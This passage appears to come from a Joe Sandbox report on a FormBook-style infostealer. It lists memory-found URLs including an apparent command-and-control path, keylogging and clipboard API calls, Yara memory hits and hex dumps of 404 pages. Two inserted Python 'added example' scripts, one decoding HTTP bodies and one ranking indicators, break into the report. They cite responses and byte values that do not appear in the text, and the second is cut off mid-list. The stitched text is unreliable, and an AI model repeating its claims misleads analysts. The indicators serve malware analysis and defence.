                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx/1.20.1
                Date: Wed, 03 Jul 2024 13:59:52 GMT
                Content-Type: text/html
                Content-Length: 3650
                Connection: close
                ETag: "663a05b6-e42"
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
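Reconstructing the bodies behind the "Data Raw" dumps above, as an added example rather than code from Joe Sandbox: the nginx entry is copied from the first 404 in this report (162 bytes, matching its Content-Length), while the Apache chunked-plus-gzip entry is constructed by a helper because the page only shows that response in compressed form. The decoder assumes an entry laid out as the status line, one header per line, and a final "Data Raw:" line of space-separated hex bytes; it dechunks, gunzips and cross-checks the declared lengths, and rejects the truncated dumps the report produces for long bodies instead of silently returning a partial page.

```python
"""Rebuild HTTP response bodies from Joe Sandbox "Data Raw" hex dumps.

Added example, not code from the Joe Sandbox report. It assumes an entry laid
out as the status line, one header per line, and a final "Data Raw:" line of
space-separated hex bytes (the detections above once their fields are split).
"""
import gzip

# Copied from the first nginx 404 detection in the report (Content-Length: 162).
NGINX_ENTRY = """HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 03 Jul 2024 13:58:45 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 162
Connection: close
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
"""


def parse_entry(entry: str):
    """Split an entry into (status line, lower-cased header dict, raw body bytes)."""
    lines = entry.strip().splitlines()
    status, headers, raw = lines[0].strip(), {}, b""
    for line in lines[1:]:
        if line.startswith("Data Raw:"):
            raw = bytes.fromhex(line[len("Data Raw:"):])   # fromhex skips whitespace
        elif ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return status, headers, raw


def dechunk(raw: bytes) -> bytes:
    """Undo chunked transfer encoding, refusing truncated or misframed chunks."""
    out, pos = bytearray(), 0
    while True:
        end = raw.find(b"\r\n", pos)
        if end < 0:
            raise ValueError("chunk-size line not terminated")
        size = int(raw[pos:end].split(b";")[0], 16)      # drop chunk extensions
        pos = end + 2
        if size == 0:
            return bytes(out)                             # last chunk; trailers ignored
        chunk = raw[pos:pos + size]
        if len(chunk) != size or raw[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("truncated chunk")
        out += chunk
        pos += size + 2


def decode_body(headers: dict, raw: bytes) -> bytes:
    """Apply transfer then content decoding, cross-checking what the headers claim."""
    body = raw
    if "chunked" in headers.get("transfer-encoding", "").lower():
        body = dechunk(body)
    elif "content-length" in headers:
        declared = int(headers["content-length"])
        if declared != len(body):     # the report truncates long dumps; do not trust them
            raise ValueError(f"Content-Length {declared} but {len(body)} bytes captured")
    if headers.get("content-encoding", "").lower() == "gzip":
        if body[:2] != b"\x1f\x8b":
            raise ValueError("Content-Encoding: gzip but no gzip magic")
        body = gzip.decompress(body)
    return body


def decode_entry(entry: str) -> bytes:
    _, headers, raw = parse_entry(entry)
    return decode_body(headers, raw)


def server_banner(entry: str) -> str:
    return parse_entry(entry)[1].get("server", "")


def make_chunked_gzip_entry(html: bytes, date: str) -> str:
    """Constructed Apache-style chunked + gzip entry in the same layout, so the
    decoder can be exercised on the shape of the 13:58:59 response above."""
    payload = gzip.compress(html, mtime=0)
    framed = b"%x\r\n" % len(payload) + payload + b"\r\n0\r\n\r\n"
    return "\n".join([
        "HTTP/1.1 404 Not Found",
        "Content-Type: text/html",
        "Transfer-Encoding: chunked",
        "Connection: close",
        "Date: " + date,
        "Server: Apache",
        "Content-Encoding: gzip",
        "Data Raw: " + framed.hex(" "),
    ])


if __name__ == "__main__":
    print(decode_entry(NGINX_ENTRY).decode())
    print(decode_entry(make_chunked_gzip_entry(b"<h1>Error 404</h1>", "x")))
```

Two checks worth doing by hand on the dumps above before trusting a decode: the Apache responses start with `31 38 31 0d 0a` ("181\r\n"), so the single chunk is 0x181 = 385 bytes, and the last four bytes of the gzip member, `54 02 00 00`, are the little-endian uncompressed size, 0x254 = 596 bytes, which is exactly the Content-Length of the uncompressed Apache 404 at 13:59:06. For the nginx/1.20.1 and WordPress entries the captured bytes fall short of the declared Content-Length, so `decode_entry` raises rather than returning a partial body.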
            Source: subst.exe, 00000004.00000002.4163884021.0000000004F4E000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000004A9E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://fedoraproject.org/
            Source: subst.exe, 00000004.00000002.4163884021.0000000004F4E000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000004A9E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://nginx.net/
            Source: subst.exe, 00000004.00000002.4166115589.0000000006160000.00000004.00000800.00020000.00000000.sdmp, subst.exe, 00000004.00000002.4163884021.0000000003F9A000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003AEA000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://push.zhanzhang.baidu.com/push.js
            Source: subst.exe, 00000004.00000002.4163884021.0000000004DBC000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.000000000490C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://vendasnaweb1.com/j5qz/?TvpPfhGp=wDVhqh7/L6S0ssmI
            Source: UJCHZIamnVz.exe, 00000007.00000002.4165384039.00000000056F7000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.rodotest2.pro
            Source: UJCHZIamnVz.exe, 00000007.00000002.4165384039.00000000056F7000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.rodotest2.pro/50i6/
            Source: subst.exe, 00000004.00000003.2149963450.0000000007BAD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: subst.exe, 00000004.00000003.2149963450.0000000007BAD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: subst.exe, 00000004.00000002.4163884021.0000000003AE4000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003634000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2253264572.000000002B8C4000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://cdn.jqueryscdns.net/jquery-3.7.1.min.js
            Source: subst.exe, 00000004.00000003.2149963450.0000000007BAD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: subst.exe, 00000004.00000003.2149963450.0000000007BAD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: subst.exe, 00000004.00000002.4166115589.0000000006160000.00000004.00000800.00020000.00000000.sdmp, subst.exe, 00000004.00000002.4163884021.0000000003E08000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003958000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
            Source: subst.exe, 00000004.00000003.2149963450.0000000007BAD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: subst.exe, 00000004.00000003.2149963450.0000000007BAD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: subst.exe, 00000004.00000003.2149963450.0000000007BAD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: subst.exe, 00000004.00000002.4163884021.0000000003AE4000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003634000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2253264572.000000002B8C4000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://f385xw.com/register
            Source: subst.exe, 00000004.00000002.4163884021.0000000003E08000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003958000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
            Source: subst.exe, 00000004.00000002.4163884021.0000000003E08000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003958000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
            Source: subst.exe, 00000004.00000002.4163884021.0000000003E08000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003958000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
            Source: subst.exe, 00000004.00000002.4163884021.0000000003E08000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003958000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://hm.baidu.com/hm.js?
            Source: subst.exe, 00000004.00000002.4166115589.0000000006160000.00000004.00000800.00020000.00000000.sdmp, subst.exe, 00000004.00000002.4163884021.0000000003E08000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003958000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
            Source: subst.exe, 00000004.00000002.4166115589.0000000006160000.00000004.00000800.00020000.00000000.sdmp, subst.exe, 00000004.00000002.4163884021.0000000003E08000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003958000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
            Source: subst.exe, 00000004.00000002.4163884021.0000000003AE4000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003634000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2253264572.000000002B8C4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://js.users.51.la/21879113.js
            Source: subst.exe, 00000004.00000002.4162582023.0000000002C9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: subst.exe, 00000004.00000002.4162582023.0000000002C9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: subst.exe, 00000004.00000002.4162582023.0000000002C9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: subst.exe, 00000004.00000002.4162582023.0000000002C9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: subst.exe, 00000004.00000002.4162582023.0000000002C9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: subst.exe, 00000004.00000002.4162582023.0000000002C9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: subst.exe, 00000004.00000003.2144578147.0000000007B8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: subst.exe, 00000004.00000002.4166115589.0000000006160000.00000004.00000800.00020000.00000000.sdmp, subst.exe, 00000004.00000002.4163884021.0000000003E08000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003958000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://track.uc.cn/collect
            Source: subst.exe, 00000004.00000003.2149963450.0000000007BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: subst.exe, 00000004.00000003.2149963450.0000000007BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: subst.exe, 00000004.00000002.4166115589.0000000006160000.00000004.00000800.00020000.00000000.sdmp, subst.exe, 00000004.00000002.4163884021.0000000003F9A000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003AEA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_0021425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0021425A
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_00214458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00214458
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_0021425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0021425A
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_00200219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00200219
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_0022CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0022CDAC

            E-Banking Fraud

            Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000004.00000002.4163255466.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4162187382.0000000000830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1967957948.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1968363208.00000000038D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4162478682.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1968884330.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4163300871.00000000045E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
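Added triage example, not part of the Joe Sandbox report and not Joe Sandbox's code. The memory-dump identifiers attached to the URL strings above and to the Yara hits in this section record where each finding was seen, and decoding them separates the one operator host from the noise. The script assumes the identifier layout <proc>.<run>.<dumpid>.<base>.<protect>.<flags>.<type>.<n>.sdmp with the Windows MEMORY_BASIC_INFORMATION Protect and Type values in the fifth and seventh fields; that layout is inferred from this report's own identifiers and should be treated as an assumption, as should the benign-host list. On the lines above it places the FormBook Yara hit in svchost.exe at 0x400000 in a PAGE_EXECUTE_READWRITE MEM_MAPPED region, which is a manually mapped image rather than a loader-backed module, ranks http://www.rodotest2.pro/50i6/ as the C2 candidate because it is the only URL seen in such a region, and files the search-provider templates and login.live.com endpoints as browser-profile and Windows sign-in residue, consistent with the report's browser-harvesting signatures rather than with command-and-control. The embedded input is a constructed subset of the lines above.

```python
"""Added triage example; not code from the Joe Sandbox report.

Decodes the memory-dump identifiers the report attaches to each finding and
uses them to rank the URL strings and the Yara hits listed above.  The layout
<proc>.<run>.<dumpid>.<base>.<protect>.<flags>.<type>.<n>.sdmp, with Windows
MEMORY_BASIC_INFORMATION Protect and Type values in <protect> and <type>, is
inferred from this report's identifiers and is an assumption; so is the
benign-host list.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from urllib.parse import urlsplit

PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
           0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_IMAGE = 0x1000000
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}

DUMP_RE = re.compile(
    r"(?P<proc>[0-9A-F]{8})\.[0-9A-F]{8}\.\d+\.(?P<base>[0-9A-F]{16})"
    r"\.(?P<protect>[0-9A-F]{8})\.[0-9A-F]{8}\.(?P<type>[0-9A-F]{8})\.[0-9A-F]{8}\.sdmp")
URL_RE = re.compile(r"https?://.+?(?=https?://|\s|$)")

# Assumed allow-list: hosts an infostealer sweeps up when it reads browser
# profiles (default search providers) and the Windows account sign-in flow.
BENIGN_HOSTS = ("duckduckgo.com", "ecosia.org", "search.yahoo.com",
                "google.com", "login.live.com")


@dataclass(frozen=True)
class Dump:
    proc: int
    base: int
    protect: int
    mem_type: int

    @property
    def suspicious(self) -> bool:
        # Executable memory that is not a loaded image is what manual mapping and
        # shellcode injection leave behind; loader-backed modules are MEM_IMAGE.
        return self.protect in (0x20, 0x40) and self.mem_type != MEM_IMAGE

    def describe(self) -> str:
        return (f"proc {self.proc} base 0x{self.base:X} "
                f"{PROTECT.get(self.protect, hex(self.protect))} "
                f"{MEM_TYPE.get(self.mem_type, hex(self.mem_type))}")


def parse_dump(name: str) -> Dump:
    m = DUMP_RE.search(name)
    if m is None:
        raise ValueError(f"not a memory-dump identifier: {name}")
    return Dump(int(m["proc"], 16), int(m["base"], 16),
                int(m["protect"], 16), int(m["type"], 16))


def is_benign_host(host: str) -> bool:
    return any(host == h or host.endswith("." + h) for h in BENIGN_HOSTS)


def rank_url_line(line: str) -> list[tuple[str, str]]:
    """(url, verdict) pairs for one 'String found in binary or memory' line."""
    src, _, found = line.partition("String found in binary or memory:")
    from_injected = any(parse_dump(m.group(0)).suspicious
                        for m in DUMP_RE.finditer(src))
    verdicts = []
    for url in URL_RE.findall(found):  # also splits URLs glued together in memory
        host = urlsplit(url).hostname or ""
        if is_benign_host(host):
            verdict = "benign-browser-or-os"
        elif from_injected:
            verdict = "c2-candidate"   # seen in an executable, non-image region
        else:
            verdict = "review"
        verdicts.append((url, verdict))
    return verdicts


def rank_yara_hits(names: list[str]) -> list[tuple[str, bool]]:
    """(description, injected?) per Yara-hit dump; unpacked-PE names are skipped."""
    hits = []
    for name in names:
        try:
            d = parse_dump(name)
        except ValueError:
            continue
        hits.append((d.describe(), d.suspicious))
    return hits


# Constructed sample input: lines copied from the report section above.
SAMPLE_URL_LINES = [
    "Source: UJCHZIamnVz.exe, 00000007.00000002.4165384039.00000000056F7000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.rodotest2.pro/50i6/",
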